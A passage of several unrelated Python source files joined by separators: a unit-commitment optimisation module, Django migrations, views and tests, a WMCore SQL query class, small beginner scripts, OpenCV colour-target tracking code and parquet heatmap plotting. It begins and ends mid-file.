    linear programs don't have if statements. Instead, we'll define extra
    decision variables that are tightly constrained. Since startup incurs
    costs and shutdown does not, the linear program will not simultaneously
    set both of these to non-zero values.
    Startup[(proj, t) in PROJ_DISPATCH_POINTS] is a decision variable
    describing how much additional capacity was brought online in a given
    timepoint. Committing additional capacity incurs startup costs for
    fossil plants from fuel requirements as well as additional O&M
    costs.
    Shutdown[(proj, t) in PROJ_DISPATCH_POINTS] is a decision variable
    describing how much committed capacity to take offline in a given
    timepoint.
    Commit_Startup_Shutdown_Consistency[(proj, t) in
    PROJ_DISPATCH_POINTS] is a constraint that forces consistency
    between commitment decision from one hour to the next with startup
    and shutdown.
    g_startup_fuel[g in FUEL_BASED_GEN] describes fuel
    requirements of starting up additional generation capacity expressed
    in units of MMBTU / MW. This optional parameter has a default value
    of 0.
    proj_startup_fuel[proj in FUEL_BASED_PROJECTS] is the same as
    g_startup_fuel except on a project basis. This optional parameter
    defaults to g_startup_fuel.
    g_startup_om[g in GENERATION_TECHNOLOGIES] describes operations and
    maintenance costs incurred from starting up additional generation
    capacity expressed in units of $base_year / MW. This could represent
    direct maintenance requirements or some overall depreciation rate
    from accelerated wear and tear. This optional parameter has a
    default value of 0.
    proj_startup_om[proj in PROJECTS] is the same as g_startup_om except
    on a project basis. This optional parameter defaults to g_startup_om.
    Total_Startup_OM_Costs[t in TIMEPOINTS] is an expression for passing
    total startup O&M costs to the sys_cost module.
    -- Dispatch limits based on committed capacity --
    g_min_load_fraction[g] describes the minimum loading level of a
    generation technology as a fraction of committed capacity. Many
    fossil plants - especially baseload - have a minimum run level which
    should be stored here. Note that this is only applied to committed
    capacity. This is an optional parameter that defaults to 1 for
    generation technologies marked baseload and 0 for all other
    generators. This parameter is only relevant when considering unit
    commitment so it is defined here rather than the gen_tech module.
    proj_min_load_fraction[(proj, t) in PROJ_DISPATCH_POINTS] describes
    the minimum loading level for each project and timepoint as a fraction
    of committed capacity. This is an optional parameter that defaults
    to g_min_load_fraction, which in turn defaults to 0. You may wish to
    vary this by timepoint to establish minimum flow rates for
    hydropower, to specify thermal demand for a cogeneration project, or
    specify must-run reliability constraints in a geographically or
    temporally detailed model. This could also be used to constrain
    dispatch of distributed solar resources that cannot be curtailed by
    the system operator.
    DispatchLowerLimit[(proj, t) in PROJ_DISPATCH_POINTS] and
    DispatchUpperLimit[(proj, t) in PROJ_DISPATCH_POINTS] are
    expressions that define the lower and upper bounds of dispatch.
    Lower bounds are calculated as CommitProject * proj_min_load_fraction,
    and upper bounds are calculated relative to committed capacity and
    renewable resource availability.
    Enforce_Dispatch_Lower_Limit[(proj, t) in PROJ_DISPATCH_POINTS] and
    Enforce_Dispatch_Upper_Limit[(proj, t) in PROJ_DISPATCH_POINTS] are
    constraints that limit DispatchProj to the upper and lower bounds
    defined above.
    DispatchLowerLimit <= DispatchProj <= DispatchUpperLimit
    DispatchSlackUp[(proj, t) in PROJ_DISPATCH_POINTS] is an expression
    that describes the amount of additional committed capacity available
    for dispatch: DispatchUpperLimit - DispatchProj
    DispatchSlackDown[(proj, t) in PROJ_DISPATCH_POINTS] is an
    expression that describes the amount by which dispatch could be
    lowered, that is how much downramp potential each project has
    in each timepoint: DispatchProj - DispatchLowerLimit
    """
    # Commitment decision, bounds and associated slack variables
    mod.CommitProject = Var(
        mod.PROJ_DISPATCH_POINTS,
        within=NonNegativeReals)
    mod.proj_max_commit_fraction = Param(
        mod.PROJ_DISPATCH_POINTS,
        within=PercentFraction,
        default=lambda m, proj, t: 1.0)
    mod.proj_min_commit_fraction = Param(
        mod.PROJ_DISPATCH_POINTS,
        within=PercentFraction,
        default=lambda m, proj, t: (
            m.proj_max_commit_fraction[proj, t]
            if proj in m.BASELOAD_PROJECTS
            else 0.0))
    mod.CommitLowerLimit = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: (
            m.ProjCapacityTP[proj, t] * m.proj_availability[proj] *
            m.proj_min_commit_fraction[proj, t]))
    mod.CommitUpperLimit = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: (
            m.ProjCapacityTP[proj, t] * m.proj_availability[proj] *
            m.proj_max_commit_fraction[proj, t]))
    mod.Enforce_Commit_Lower_Limit = Constraint(
        mod.PROJ_DISPATCH_POINTS,
        rule=lambda m, proj, t: (
            m.CommitLowerLimit[proj, t] <= m.CommitProject[proj, t]))
    mod.Enforce_Commit_Upper_Limit = Constraint(
        mod.PROJ_DISPATCH_POINTS,
        rule=lambda m, proj, t: (
            m.CommitProject[proj, t] <= m.CommitUpperLimit[proj, t]))
    mod.CommitSlackUp = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: (
            m.CommitUpperLimit[proj, t] - m.CommitProject[proj, t]))
    mod.CommitSlackDown = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: (
            m.CommitProject[proj, t] - m.CommitLowerLimit[proj, t]))
    # Startup & Shutdown
    mod.Startup = Var(
        mod.PROJ_DISPATCH_POINTS,
        within=NonNegativeReals)
    mod.Shutdown = Var(
        mod.PROJ_DISPATCH_POINTS,
        within=NonNegativeReals)
    mod.Commit_Startup_Shutdown_Consistency = Constraint(
        mod.PROJ_DISPATCH_POINTS,
        rule=lambda m, pr, t: (
            m.CommitProject[pr, m.tp_previous[t]] +
            m.Startup[pr, t] - m.Shutdown[pr, t] == m.CommitProject[pr, t]))
    mod.g_startup_fuel = Param(mod.FUEL_BASED_GEN, default=0.0)
    mod.g_startup_om = Param(mod.GENERATION_TECHNOLOGIES, default=0.0)
    mod.proj_startup_fuel = Param(
        mod.FUEL_BASED_PROJECTS,
        default=lambda m, pr: m.g_startup_fuel[m.proj_gen_tech[pr]])
    mod.proj_startup_om = Param(
        mod.PROJECTS,
        default=lambda m, pr: m.g_startup_om[m.proj_gen_tech[pr]])
    # Startup costs need to be divided over the duration of the
    # timepoint because it is a one-time expenditure in units of $
    # but cost_components_tp requires an hourly cost rate in $ / hr.
    # NOTE(review): the filtered sum below scans every (proj, t2) pair for
    # every timepoint, i.e. O(|TIMEPOINTS| * |PROJ_DISPATCH_POINTS|);
    # fine for small models, but worth an index if construction is slow.
    mod.Total_Startup_OM_Costs = Expression(
        mod.TIMEPOINTS,
        initialize=lambda m, t: sum(
            m.proj_startup_om[proj] * m.Startup[proj, t] / m.tp_duration_hrs[t]
            for (proj, t2) in m.PROJ_DISPATCH_POINTS
            if t == t2))
    mod.cost_components_tp.append('Total_Startup_OM_Costs')
    # Dispatch limits relative to committed capacity.
    mod.g_min_load_fraction = Param(
        mod.GENERATION_TECHNOLOGIES,
        within=PercentFraction,
        default=lambda m, g: 1.0 if m.g_is_baseload[g] else 0.0)
    mod.proj_min_load_fraction = Param(
        mod.PROJ_DISPATCH_POINTS,
        default=lambda m, pr, t: m.g_min_load_fraction[m.proj_gen_tech[pr]])
    mod.DispatchLowerLimit = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, pr, t: (
            m.CommitProject[pr, t] * m.proj_min_load_fraction[pr, t]))
    def DispatchUpperLimit_expr(m, pr, t):
        # Variable (renewable) projects are additionally limited by their
        # maximum capacity factor in each timepoint.
        if pr in m.VARIABLE_PROJECTS:
            return m.CommitProject[pr, t] * m.prj_max_capacity_factor[pr, t]
        else:
            return m.CommitProject[pr, t]
    mod.DispatchUpperLimit = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=DispatchUpperLimit_expr)
    mod.Enforce_Dispatch_Lower_Limit = Constraint(
        mod.PROJ_DISPATCH_POINTS,
        rule=lambda m, proj, t: (
            m.DispatchLowerLimit[proj, t] <= m.DispatchProj[proj, t]))
    mod.Enforce_Dispatch_Upper_Limit = Constraint(
        mod.PROJ_DISPATCH_POINTS,
        rule=lambda m, proj, t: (
            m.DispatchProj[proj, t] <= m.DispatchUpperLimit[proj, t]))
    mod.DispatchSlackUp = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: (
            m.DispatchUpperLimit[proj, t] - m.DispatchProj[proj, t]))
    mod.DispatchSlackDown = Expression(
        mod.PROJ_DISPATCH_POINTS,
        initialize=lambda m, proj, t: (
            m.DispatchProj[proj, t] - m.DispatchLowerLimit[proj, t]))
def load_inputs(mod, switch_data, inputs_dir):
    """
    Import data to support unit commitment. The following files are
    expected in the input directory. All files and fields are optional.
    If you only want to override default values for certain columns in a
    row, insert a dot . into the other columns.
    gen_unit_commit.tab
        generation_technology, g_min_load_fraction, g_startup_fuel,
        g_startup_om
    Note: If you need to specify minimum loading fraction or startup
    costs for a non-fuel based generator, you must put a dot . in the
    g_startup_fuel column to avoid an error.
    proj_commit_bounds_timeseries.tab
        PROJECT, TIMEPOINT, proj_min_commit_fraction, proj_max_commit_fraction,
        proj_min_load_fraction
    """
    # Both files are optional; a missing file simply leaves the
    # parameter defaults from define_components() in place.
    switch_data.load_aug(
        optional=True,
        filename=os.path.join(inputs_dir, 'gen_unit_commit.tab'),
        select=('generation_technology', 'g_min_load_fraction',
                'g_startup_fuel', 'g_startup_om'),
        param=(mod.g_min_load_fraction, mod.g_startup_fuel,
               mod.g_startup_om))
    switch_data.load_aug(
        optional=True,
        filename=os.path.join(inputs_dir, 'proj_commit_bounds_timeseries.tab'),
        select=('PROJECT', 'TIMEPOINT', 'proj_min_commit_fraction',
                'proj_max_commit_fraction', 'proj_min_load_fraction'),
        param=(mod.proj_min_commit_fraction, mod.proj_max_commit_fraction,
               mod.proj_min_load_fraction))
|
# Generated by Django 2.2.1 on 2019-11-12 16:47
import core.storage.utils
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional profile image field to the user model."""
    dependencies = [
        ('users', '0007_auto_20190827_1138'),
    ]
    operations = [
        migrations.AddField(
            model_name='user',
            name='image',
            # blank/null: existing rows keep working without an image;
            # upload path is computed by the project's storage helper.
            field=models.ImageField(blank=True, null=True, upload_to=core.storage.utils.public_image_upload_to),
        ),
    ]
|
#!/usr/bin/env python
"""
_GetOutputMap_
MySQL implementation of Jobs.GetOutputMap
"""
from WMCore.Database.DBFormatter import DBFormatter
class GetOutputMap(DBFormatter):
    """
    Look up the workflow output map for a job: every output identifier
    of the job's workflow, with its fileset and merged fileset IDs.
    """
    sql = """SELECT wmbs_workflow_output.output_identifier AS wf_output_id,
                    wmbs_workflow_output.output_fileset AS wf_output_fset,
                    wmbs_workflow_output.merged_output_fileset AS wf_output_mfset
             FROM wmbs_workflow_output
               INNER JOIN wmbs_subscription ON
                 wmbs_workflow_output.workflow_id = wmbs_subscription.workflow
               INNER JOIN wmbs_jobgroup ON
                 wmbs_subscription.id = wmbs_jobgroup.subscription
               INNER JOIN wmbs_job ON
                 wmbs_jobgroup.id = wmbs_job.jobgroup
             WHERE wmbs_job.id = :jobid"""
    def execute(self, jobID, conn = None, transaction = False):
        """
        Run the query for *jobID* and return a dict mapping each output
        identifier to a list of {output_fileset, merged_output_fileset}.
        """
        rows = self.dbi.processData(self.sql, {"jobid": jobID}, conn = conn,
                                    transaction = transaction)
        outputMap = {}
        for row in self.formatDict(rows):
            entry = {"output_fileset": row["wf_output_fset"],
                     "merged_output_fileset": row["wf_output_mfset"]}
            outputMap.setdefault(row["wf_output_id"], []).append(entry)
        return outputMap
|
# scored.py
# Repeatedly read test scores (from 0 to 100), until the user
# enter -1 to finish. The input part of the program will ensure
# that the numbers are in the correct range.
# For each score, report the corresponding grade:
# 90-100 = A, 80-89 = B, 70-79 = C, 60-69 = D, < 60 = F
# When you have all the scores, report the number of scores
# entered, the total points and the average score.
# Display letter grade
def display_grade(score):
    """Print the letter-grade message for a numeric score (0-100)."""
    # Threshold table, highest grade first; anything below 60 is an F.
    grade_messages = (
        (90, "Congratulations! That is an A."),
        (80, "Good job. That is a B."),
        (70, "You are passing with a C."),
        (60, "Please study more. You have a D."),
    )
    for threshold, message in grade_messages:
        if score >= threshold:
            print(message)
            return
    print("Sorry, that is an F.")
# Prompt user for score and returns score
def get_score():
    """Prompt until the user enters a score in [0, 100] or -1; return it."""
    while True:
        score = float(input('Enter a score 0-100, or -1 to finish: '))
        # -1 is the sentinel to stop; otherwise the score must be 0-100
        if score == -1 or 0 <= score <= 100:
            return score
        print("Please enter a valid score.")
def main():
    """Read scores until -1, grading each, then report count/total/average."""
    count_scores = 0
    total_scores = 0
    # Read scores until the user enters the -1 sentinel
    while True:
        score = get_score()
        if score == -1:
            break
        display_grade(score)
        count_scores += 1
        total_scores += score
    # Report summary statistics only if at least one score was entered
    if count_scores > 0:
        average = total_scores / count_scores
        print(f"Total number of scores: {count_scores}")
        print(f"Total number of points: {total_scores:.1f}")
        print(f"Average score: {average:.2f}")
    else:
        print("No scores entered; no average computed.")
# Run only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()
|
## -*- coding: utf-8 -*-
import sys
import cv2
import numpy as np
import time
from math import sqrt
ball_color = 'yellow'  # key into color_dist selecting the color to track
# Per-color HSV thresholds (OpenCV hue range is 0-180) used by cv2.inRange.
color_dist = {'red': {'Lower': np.array([0, 60, 60]), 'Upper': np.array([6, 255, 255])},
              'blue': {'Lower': np.array([100, 80, 46]), 'Upper': np.array([124, 255, 255])},
              'green': {'Lower': np.array([35, 43, 35]), 'Upper': np.array([90, 255, 255])},
              # NOTE(review): hue 0-100 spans red through green, unusually
              # wide for "yellow" -- confirm against the camera's output.
              'yellow':{'Lower': np.array([0, 70, 70]), 'Upper': np.array([100, 255, 255])},
              }
#cv2.namedWindow('camera', cv2.WINDOW_AUTOSIZE)
# Convert a width measured in pixels into a real-world scale factor.
def pixel_to_distance(width):
    """Return the real-distance-per-pixel ratio for a detected width.

    Assumes the tracked object's physical width is 0.095 (presumably
    metres) — TODO confirm against the hardware setup.
    """
    return 0.09500 / width
# Lens-distortion correction for raw camera frames.
def correct_img(img):
    """Undistort a frame using the camera's hard-coded calibration data."""
    # Intrinsic matrix (fx, fy and principal point) from a prior calibration run.
    intrinsics = np.float32([[371.450355, 0.000000, 320.451676],
                             [0.000000, 494.574368, 234.028774],
                             [0.000000, 0.000000, 1.000000]])
    height, width = img.shape[:2]
    # Distortion coefficients (k1, k2, p1, p2, k3).
    coeffs = np.float32([-0.347383, 0.081498, 0.004733, -0.001698, 0.000000])
    # alpha=1 keeps every source pixel visible in the corrected image.
    new_matrix, _roi = cv2.getOptimalNewCameraMatrix(
        intrinsics, coeffs, (width, height), 1, (width, height))
    return cv2.undistort(img, intrinsics, coeffs, None, new_matrix)
# Convert the detected target's image position into real-world x, y coordinates.
def coordinate_transformation(frame):
    """Find the largest ``ball_color`` contour in ``frame`` and return its
    real-world (x, y) centre relative to the image centre.

    Returns two empty lists when ``frame`` is None or no contour is found.
    """
    actural_central_x = []
    actural_central_y = []
    if frame is not None:
        # frame = cv2.flip(frame,0)
        # Undistort the frame; the image centre becomes the coordinate origin.
        img1 = frame
        img1 = correct_img(img1)  # remove lens distortion
        #img1 = cv2.flip(img1, 0)  # vertical flip to right the image
        gs_frame = cv2.GaussianBlur(img1, (5, 5), 0)  # Gaussian blur
        hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV)  # convert to HSV space
        erode_hsv = cv2.erode(hsv, None, iterations=2)  # erode to thin blobs
        inRange_hsv = cv2.inRange(erode_hsv, color_dist[ball_color]['Lower'], color_dist[ball_color]['Upper'])
        cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
        if cnts != []:
            # Keep only the biggest contour and its minimum-area bounding box.
            c = max(cnts, key=cv2.contourArea)
            rect = cv2.minAreaRect(c)
            box = cv2.boxPoints(rect)
            box = np.int0(box)
            #print(box)
            # Box corners start nearest the top-left origin and run clockwise.
            # Shift the origin to the image centre (320, 240 for a 640x480 frame).
            box1 = box[1]
            box2 = box[2]
            box3 = box[3]
            box4 = box[0]
            a_point_x = box1[0] - 320
            b_point_x = box2[0] - 320
            c_point_x = box3[0] - 320
            d_point_x = box4[0] - 320
            a_point_y = box1[1] - 240
            b_point_y = box2[1] - 240
            c_point_y = box3[1] - 240
            d_point_y = box4[1] - 240
            if c_point_x > a_point_x:
                # Midpoint of the box diagonal = target centre in pixels.
                central_point_x = (a_point_x + c_point_x) * 0.5
                central_point_y = (a_point_y + c_point_y) * 0.5
                width = sqrt((b_point_x - a_point_x) ** 2 + (b_point_y - a_point_y) ** 2)  # edge length in pixels
                l = pixel_to_distance(width)  # pixel-to-real-distance ratio
                # The 0.05 offset presumably compensates for the camera mount — TODO confirm.
                actural_central_x = -central_point_x * l
                actural_central_y = central_point_y * l + 0.05
                # draw bounding box (debug)
                #cv2.drawContours(img1, [np.int0(box)], -1, (0, 255, 255), 2)
    else:
        print("image is an empty !!!")
    #cv2.imshow('correct', img1)
    #cv2.waitKey(10)
    return actural_central_x, actural_central_y
# Rotate the frame so the detected target's bounding box is axis-aligned.
def cr_img(frame):
    """Return ``frame`` rotated by the detected target's box angle.

    Returns an empty list when ``frame`` is None or no contour is found.
    """
    result_img = []
    if frame is not None:
        # Straighten the original image.
        img = frame
        # img = cv2.flip(img, 1)
        # img = cv2.flip(img, 0)  # vertical flip to right the image
        gs_frame = cv2.GaussianBlur(img, (5, 5), 0)  # Gaussian blur
        hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV)  # convert to HSV space
        erode_hsv = cv2.erode(hsv, None, iterations=2)  # erode to thin blobs
        inRange_hsv = cv2.inRange(erode_hsv, color_dist[ball_color]['Lower'], color_dist[ball_color]['Upper'])
        cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
        if cnts != []:
            c = max(cnts, key=cv2.contourArea)
            rect = cv2.minAreaRect(c)
            # rect[2] is the min-area box rotation angle in degrees.
            angle = rect[2]
            box = cv2.boxPoints(rect)
            box = np.int0(box)
            draw_img = cv2.drawContours(img.copy(), [box], -1, (0, 0, 255), 3)
            rows, cols = img.shape[:2]
            # Rotate about the image centre by the box angle to deskew it.
            M = cv2.getRotationMatrix2D((cols / 2, rows / 2), angle, 1)
            result_img = cv2.warpAffine(img, M, (cols, rows))
    return result_img
# Extract the yellow region from the frame and crop the image around it.
def cutimg(frame):
    """Crop ``frame`` to the detected ``ball_color`` region (for OCR).

    Returns the cropped image, the whole frame when the detected box is
    degenerate, or an empty list when ``frame`` is None.
    """
    img = []
    if frame is not None:
        # Isolate the yellow area of the original image and crop it for
        # text recognition downstream.
        img = frame
        img1 = frame.copy()
        gs_frame = cv2.GaussianBlur(frame, (5, 5), 0)  # Gaussian blur
        hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV)  # convert to HSV space
        erode_hsv = cv2.erode(hsv, None, iterations=2)  # erode to thin blobs
        inRange_hsv = cv2.inRange(erode_hsv, color_dist[ball_color]['Lower'], color_dist[ball_color]['Upper'])
        cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
        if cnts != []:
            c = max(cnts, key=cv2.contourArea)
            rect = cv2.minAreaRect(c)
            box = cv2.boxPoints(rect)
            box = np.int0(box)
            # Crop the original image around the detected box.
            box1 = box[1]
            box2 = box[2]
            box3 = box[3]
            box4 = box[0]
            a_point_x1 = box1[0]
            b_point_x1 = box2[0]
            c_point_x1 = box3[0]
            d_point_x1 = box4[0]
            a_point_y1 = box1[1]
            b_point_y1 = box2[1]
            c_point_y1 = box3[1]
            d_point_y1 = box4[1]
            central_point_x1 = (a_point_x1 + c_point_x1) * 0.5
            central_point_y1 = (a_point_y1 + c_point_y1) * 0.5
            # Half-extents of the box relative to its centre.
            x = int((c_point_x1 - a_point_x1))
            y = int((c_point_y1 - a_point_y1))
            x1 = central_point_x1 - a_point_x1
            y1 = central_point_y1 - b_point_y1
            S = x * y
            # Skip cropping when the detected box has zero area.
            if S != 0 :
                # Clamp to the image when the crop window would start off-frame.
                if central_point_y1 - y1 < 0 or central_point_x1 - x1 < 0:
                    img = img[0:int(central_point_y1 + y1),
                          0:int(central_point_x1 + x1)]
                else:
                    img = img[int(central_point_y1 - y1):int(central_point_y1 + y1),
                          int(central_point_x1 - x1):int(central_point_x1 + x1)]
            # draw bounding box (debug)
            #cv2.drawContours(frame, [np.int0(box)], -1, (0, 255, 255), 2)
            #cv2.imshow('cut', img)
            #cv2.waitKey(10)
            #img = img_resize_to_target_white(img)
    #cv2.imshow('yuantu', frame)
    #cv2.waitKey(10)
    return img
# Convert the blue drop-off marker's image position to real-world x, y coordinates.
def put_down_transformation(frame):
    """Find the largest blue contour in ``frame`` and return its real-world
    (x, y) centre relative to the image centre.

    Same pipeline as ``coordinate_transformation`` but fixed to 'blue'.
    Returns two empty lists when ``frame`` is None or no contour is found.
    """
    actural_central_put_x = []
    actural_central_put_y = []
    if frame is not None:
        # frame = cv2.flip(frame,0)
        # Undistort the frame; the image centre becomes the coordinate origin.
        img = correct_img(frame)  # remove lens distortion
        #img = cv2.flip(img, 0)  # vertical flip to right the image
        gs_frame = cv2.GaussianBlur(img, (5, 5), 0)  # Gaussian blur
        hsv = cv2.cvtColor(gs_frame, cv2.COLOR_BGR2HSV)  # convert to HSV space
        erode_hsv = cv2.erode(hsv, None, iterations=2)  # erode to thin blobs
        inRange_hsv = cv2.inRange(erode_hsv, color_dist['blue']['Lower'], color_dist['blue']['Upper'])
        cnts = cv2.findContours(inRange_hsv.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
        if cnts != []:
            c = max(cnts, key=cv2.contourArea)
            rect = cv2.minAreaRect(c)
            box = cv2.boxPoints(rect)
            box = np.int0(box)
            #print(box)
            # Box corners start nearest the top-left origin and run clockwise.
            # Shift the origin to the image centre (320, 240 for a 640x480 frame).
            box1 = box[1]
            box2 = box[2]
            box3 = box[3]
            box4 = box[0]
            a_point_x = box1[0] - 320
            b_point_x = box2[0] - 320
            c_point_x = box3[0] - 320
            d_point_x = box4[0] - 320
            a_point_y = box1[1] - 240
            b_point_y = box2[1] - 240
            c_point_y = box3[1] - 240
            d_point_y = box4[1] - 240
            if c_point_x > a_point_x:
                # Midpoint of the box diagonal = marker centre in pixels.
                central_point_x = (a_point_x + c_point_x) * 0.5
                central_point_y = (a_point_y + c_point_y) * 0.5
                width = sqrt((b_point_x - a_point_x) ** 2 + (b_point_y - a_point_y) ** 2)  # edge length in pixels
                l = pixel_to_distance(width)  # pixel-to-real-distance ratio
                # The 0.05 offset presumably compensates for the camera mount — TODO confirm.
                actural_central_put_x = -central_point_x * l
                actural_central_put_y = central_point_y * l + 0.05
                # draw bounding box (debug)
                #cv2.drawContours(img, [np.int0(box)], -1, (0, 255, 255), 2)
    else:
        print("image is an empty !!!")
    #cv2.imshow('correct', img)
    #cv2.waitKey(10)
    return actural_central_put_x, actural_central_put_y
# Get the target's real-world coordinates plus the cropped image.
def cut_coordinate(frame):
    """Return (x, y) real-world coordinates of the target and the cropped image.

    Returns ([], [], []) placeholders when no usable frame is supplied.
    """
    # NOTE: the original tested `frame != []`, which raises ValueError for
    # multi-element numpy arrays (ambiguous truth value) and then hit a
    # NameError on the return when the test was false.
    actural_central_x, actural_central_y, img = [], [], []
    if frame is not None and len(frame):
        img = frame.copy()
        actural_central_x, actural_central_y = coordinate_transformation(frame)
        #img = cr_img(img)
        img = cutimg(img)
        #img = cv2.flip(img,0)
    return actural_central_x, actural_central_y, img
|
# Bus fare calculator: R$0.50/km up to 200 km, R$0.45/km beyond that.
dist = float(input('qual a distancia da viagem em km? '))
preco = 0.50 * dist if dist <= 200 else 0.45 * dist
print('a passagem será de R${:.2f}.'.format(preco))
|
from decimal import Decimal, ROUND_HALF_UP
from django.test import TestCase
from .utils import create_test_expenses
from ..models import Expense
from ..reports import summary_overall
class ReportsTestCase(TestCase):
    """Test reports utilities for the expenses"""

    def setUp(self) -> None:
        """Set up for the reports utilities tests"""
        create_test_expenses()

    def test_summary_overall(self) -> None:
        """Test if summary_overall properly sums amount of expenses"""
        queryset = Expense.objects.all()
        result = summary_overall(queryset)
        self.assertEqual(
            result['overall'],
            # Construct Decimal from a string: Decimal(150.55) embeds the
            # binary-float representation error before quantization.
            Decimal('150.55').quantize(Decimal('0.01'), rounding=ROUND_HALF_UP)
        )
|
from django.apps import AppConfig
class FuturecostsConfig(AppConfig):
    """Django application configuration for the ``futurecosts`` app."""
    name = 'futurecosts'
|
# ---------------------------------------------------------------------
# inv.inv log plugin
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from .base import InvPlugin
class LogPlugin(InvPlugin):
    """inv.inv panel plugin that exposes an inventory object's change log."""
    name = "log"
    # Client-side ExtJS panel class rendering this plugin's data.
    js = "NOC.inv.inv.plugins.log.LogPanel"

    def get_data(self, request, o):
        """Return the object's identity plus its log entries as JSON-ready dicts."""
        return {
            "id": str(o.id),
            "name": o.name,
            "model": o.model.name,
            "log": [
                {
                    # ISO timestamps so the client can parse/sort them reliably.
                    "ts": x.ts.isoformat(),
                    "user": x.user,
                    "system": x.system,
                    "managed_object": x.managed_object,
                    "op": x.op,
                    "message": x.message,
                }
                for x in o.get_log()
            ],
        }
|
from fastparquet import ParquetFile
import seaborn as sns
import matplotlib.pyplot as plt
import os
import pandas as pd
import numpy as np
from src.data.make_dataset import DataLoader
def load_all():
    """Load the full interim dataset and its per-(modality, user) row counts.

    Returns (df, data_size): the date-indexed DataFrame and a modality-by-user
    count table.

    NOTE(review): relies on the module-global ``project_dir`` that is only
    bound inside the ``__main__`` guard — calling this from an import will
    raise NameError. Verify intended usage.
    """
    df = ParquetFile(os.path.join(project_dir, 'data', 'interim', 'data.parq')).to_pandas().set_index('date')
    # The original computed this summary and silently discarded it.
    data_size = df.groupby(['modality', 'user']).size().unstack()
    return df, data_size
def parquet_heatmap():
    """Plot a heatmap of user 194's 'cpm' modality straight from the parquet file."""
    pf = ParquetFile(os.path.join(project_dir, 'data', 'interim', 'data.parq'))
    # Row-group filters avoid loading the whole dataset.
    df = pf.to_pandas(filters=[('user', '==', 194), ('modality', '==', 'cpm')]).set_index('date')  # .drop(['modality', 'user'], axis=1)
    print(df.shape)
    # Convert to the (days, slots, channels) array layout used elsewhere — TODO confirm shape.
    data = DataLoader.convert_to_npy(df, save=False)
    p = sns.heatmap(np.nan_to_num(data[:, :, 0]))
    plt.show(p)
def npy_heatmap():
    """Plot a heatmap of the first 100 rows of the cached .npy dataset."""
    # Drop the last column along axis 1 — presumably a label/extra slot; verify.
    data = np.load(os.path.join(project_dir, 'data', 'interim', 'data.npy')).astype(np.float32)[:, :-1]
    print(data.shape)
    p = sns.heatmap(data[:100, :, 0])
    plt.show(p)
if __name__=='__main__':
    # Project root: two levels up from this script.
    project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
    # Load only user 194's rows from the interim parquet dataset.
    df = ParquetFile(os.path.join(project_dir, 'data', 'interim', 'data.parq')).to_pandas(filters=[('user', '==', 194)]).set_index('date')
    modality_data = list()
    for modality, m_group in df.groupby('modality'):
        modality_data.append(m_group.drop(['modality', 'user'], axis=1))
    # We concatenate on dates to ensure the same dimension across modalities
    fig, ax = plt.subplots(ncols=2, figsize=(10, 30))
    # Left: last of 6 stacked modality slices; right: the last modality alone.
    sns.heatmap(pd.concat(modality_data, axis=1).values.reshape(-1, 6, 288)[:, -1, :], ax=ax[0])
    sns.heatmap(modality_data[-1], ax=ax[1])
    plt.show(fig)
from django.db import connection
from django.http import JsonResponse
from django.shortcuts import render
import requests
import json
from administer.models import Services, Nodes
from django.contrib import messages
from administer import context_processors
from configuration.models import Restart_after_configuration
from hdfs.models import Hdfs
from administer.helper import helper
def index(request):
    """Render the HDFS dashboard.

    Gathers the active/standby namenode rows, live and dead datanodes
    (with or without a local client installed) and the pending-restart
    flag, then renders ``hdfs/hdfs.html``. Early-returns with an error
    message when no client or no reachable master is available.
    """
    obj = helper(request, Hdfs)
    client = True
    context = context_processors.base_variables_all(request)
    if obj.atleast_one_client_is_installed():
        if obj.clientIsInstalledOnMaster():
            master = obj.get_active_master()
            if master:
                context["master_ip"] = master["ip"]
                context["master_id"] = master["id"]
                context["client"] = client
            else:
                messages.error(request,
                               "Sorry !! due to some problem we are unable to fetch the information from server."
                               " You can perform following steps to find the problem and then restart the services."
                               "<ul>"
                               "<li> Reload after 10 seconds</li>"
                               "<li> Restart again</li>"
                               "<li> Check the log of Namenode and Datanode</li>"
                               "<li> make there is no problem in configuration file </li> "
                               "</ul>")
                s_master = obj.get_service_master()
                if s_master:
                    context["master_ip"] = s_master["ip"]
                    context["master_id"] = s_master["id"]
                context["error_in_conf_file"] = True
                context["client"] = client
                return render(request, 'hdfs/hdfs.html', context)
        else:
            messages.error(request, "We have encountered some problems."
                                    "Please make sure following conditions are met"
                                    "<ul>"
                                    "<li> Client is installed on master node</li>"
                                    "<li> Environment variables for all services are set properly</li>"
                                    "<li> Restart agent on master node [url here]</li>")
            context["client"] = False
            return render(request, 'hdfs/hdfs.html', context)
    else:
        messages.error(request, "Seems like no client is installed")
        context["client"] = False
        return render(request, 'hdfs/hdfs.html', context)
    all_nodes = obj.get_all_nodes()
    cursor = connection.cursor()
    # Sub-select: IPs of HDFS nodes that also have a client installed.
    node_with_client = "select h.ip from hdfs_hdfs as h join administer_nodes " \
                       "as n on h.ip=n.ip "
    masters_sql = "select h.*,n.hostname,n.fqdn,n.name from hdfs_hdfs as h left outer join administer_nodes " \
                  "as n on h.ip=n.ip where h.type=1"
    slave_with_client = "select h.*,hm.*,n.hostname,n.fqdn,n.name from hdfs_hdfs as h join administer_nodes as n on " \
